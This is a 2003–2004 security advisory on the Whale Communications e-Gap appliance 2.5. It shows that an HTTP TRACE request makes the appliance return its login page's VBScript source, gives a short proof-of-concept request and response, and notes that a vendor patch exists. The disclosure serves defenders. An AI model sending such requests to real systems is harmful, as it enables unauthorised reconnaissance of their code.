PR03-07: Whale Communications e-Gap security appliance discloses source code via HTTP TRACE method

Vulnerability found: 1st December 2003

Advisory publicly released: 14 January 2004

Vulnerable OS: Microsoft Windows 2000 based appliance

Platform: Whale communications e-Gap security appliance Version 2.5

CVE Candidate: CVE-2003-1127

BID: 9431

CERT: VU#371470

Severity: Anonymous attackers by submitting a unexpected request, can obtain the source code of the login page.

Description:

Whale communications e-gap appliance provides a highly secure remote web access platform for companies. By submitting a unexepected HTTP method with a URL, the appliance returns the source code of the login page. It might be possible to access other pages source code. The appliance - we understand - was configured using the standard options.

Proof of concept:

Normally requesting the following brings up the login page.

REQUEST:-
GET / HTTP/1.0

PARTIAL RESPONSE:-
<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE>Whale Communications Login Page</TITLE>
[snip]

However, by substituting GET with the TRACE method, clearly returns the source code of the login page.

REQUEST:-
TRACE / HTTP/1.0

PARTIAL RESPONSE:-
<%@ Language=VBScript %>
<!--#include file="WhlCacheCleanFunc.inc"-->
<% Response.Expires = 0 %>

<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE>Whale Communications Login Page</TITLE>
[snip]

Consequences:

Remote attackers can inspect the source code of the login page, providing information which might be used in further attacks.

Fix:

Whale Communications have produced a patch for this vulnerability (as of 15th December 2003), and the advice to customers is to get in touch with their local Whale support contact.

References:

http://www.procheckup.com/Vulnerability_2004.php

Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)

Legal:

Copyright 2007 ProCheckUp Ltd.

All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp indicating this web page URL, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited.

ProCheckUp is not liable for any misuse of this information by any third party. ProCheckUp is not responsible for the content of external Internet sites.